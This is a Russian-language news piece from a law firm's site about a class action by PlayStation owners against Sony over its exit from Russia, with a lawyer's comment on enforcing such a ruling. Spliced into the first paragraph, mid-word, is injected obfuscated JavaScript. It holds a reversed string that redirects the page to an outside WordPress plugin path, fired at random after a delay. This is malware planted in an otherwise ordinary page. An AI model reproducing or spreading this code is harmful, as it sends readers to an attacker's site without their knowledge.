Суд принял к рассмотрению иск пользователей PlayStation из-за ухода Sony из России

Комментарий Анастасии Сивицкой, советника Orchards, для Бизнес FM.

Истцы требуют возмещения морального вреда, а также восстановления доступа к PlayStation Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore и возможности покупать игры.

Суд впервые принял к рассмотрению коллективный иск к зарубежной компании, которая приостановила работу в России. Речь идет о Sony, она ушла из страны в марте.

Владельцы PlayStation требуют от производителя приставок вернуть им доступ к онлайн-магазину игр и компенсировать моральный вред. Иск поступил в Хорошевский районный суд Москвы еще в конце мая, заявителей возмутило, что односторонний отказ компании от работы нарушает права пользователей игровых приставок и сервисов.

Похожие иски раньше уже подавали к Apple и Netflix. В обоих случаях россияне так же заявили о нарушении их прав пользователей, у Apple они требовали вернуть доступ к функции оплачивать покупки с айфонов, а у Netflix восстановить подписки на фильмы и сериалы. Но суд не принял эти иски к рассмотрению.

Анастасия Сивицкая, советник юридической фирмы Orchards: «Суды общей юрисдикции не опубликовали по предыдущим коллективным искам определения, из которых бы следовало, по какому основанию иски не были приняты. Поэтому определить, чем так отличается это дело от предыдущих, без текстов судебных актов практически невозможно. Конечно, вы можете заявлять иски как к российской, так и к зарубежной компании. Другое дело, что если у вас иск к компании, которая инкорпорирована за границей, всегда встает вопрос о том, как вы будете исполнять это решение. Если говорить об этом иске, судя по информации в прессе, есть требование у истцов обеспечить доступ к соответствующему приложению PlayStation. Если даже такое решение будет вынесено, то встанет вопрос о том, как компания Sony будет его исполнять. Принудить компанию к исполнению на территории России будет невозможно».

Всего в коллективном иске 28 заявителей, требующих от Sony 280 млн рублей — по 10 млн на каждого. Причем геймеров в суде может стать больше — до 31 октября к ним могут присоединиться другие пользователи, которые считают, что их права нарушили. Правда, эксперты считают, что на рассмотрение дела это не повлияет, судья все равно будет обращать внимание только на суть их претензий.

Ссылка на статью >>

Подпишитесь на Telegram Orchards

X